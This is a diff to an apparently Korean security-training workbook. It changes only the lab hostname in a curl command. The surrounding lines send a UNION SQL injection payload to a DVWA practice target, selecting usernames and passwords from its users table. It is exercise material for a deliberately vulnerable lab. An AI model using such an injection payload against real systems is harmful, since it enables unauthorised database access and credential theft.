--- a/contents/battle-workbook/attack-adv-w01.docx
+++ b/contents/battle-workbook/attack-adv-w01.docx
@@ -528,7 +528,7 @@
         <w:br/>
         <w:t># 2) 태그 단 침투 (UNION SQLi)</w:t>
         <w:br/>
-        <w:t>curl -s -A "aa01r1-kim-apt" -H "Host: dvwa.6v6.lab" \</w:t>
+        <w:t>curl -s -A "aa01r1-kim-apt" -H "Host: dvwa.el34.lab" \</w:t>
         <w:br/>
         <w:t xml:space="preserve">  "http://192.168.0.161/vulnerabilities/sqli/?id=aa01r1-kim%27%20UNION%20SELECT%20user,password%20FROM%20users--+&amp;Submit=Submit"</w:t>
       </w:r>
